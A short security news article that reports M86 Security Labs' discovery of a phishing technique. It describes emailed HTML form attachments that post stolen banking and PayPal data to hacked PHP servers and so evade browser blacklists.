A new phishing scam is targeting bank and PayPal passwords and other consumer data. The criminals are using the passwords to loot private accounts that is designed to beat security built in to Firefox and Chrome web browsers.
As part of their security packages, these browsers receive URLs of known phishing sites and won't go to them unless users specifically permit them to. But a technique discovered by M86 Security Labs gets around this black-list protection.
The new scam doesn't need victims to visit fake websites to fill out forms that appear legitimate and reveal passwords, account numbers, and Social Security numbers.
The spammers are instead sending the forms as HTML attachments to emails. When victims fill out the forms and click to submit them, the data is sent through the browser via a POST request to PHP web servers that have been hacked.
"While the POST request sends information to the phisher's remote web server, Google Chrome and Mozilla Firefox did not detect any malicious activity," the blog says. "Months-old phishing campaigns remain undetected so it seems this tactic is quite effective."
The browsers are unable to pick up that the activity is malicious, because not many compromised PHP servers get reported meaning that URLs don't make the blacklists.
Most users aren't educated on security enough to distinguish the URL from the PHP submission, M86 says in the blog.
Also, as the PHP script doesn't show any HTML code to the browser, the URLs that the data is sent to are hard to verify as phishing sites, the blog suggests.
In a specific case that M86 describes, the PHP server involved had been installed on a compromised Frito-Lay Web page. After grabbing the victim's data, the PHP script redirects the browser to the legitimate company the victim thought it was dealing with
Return to security news headlines
View Security News Archive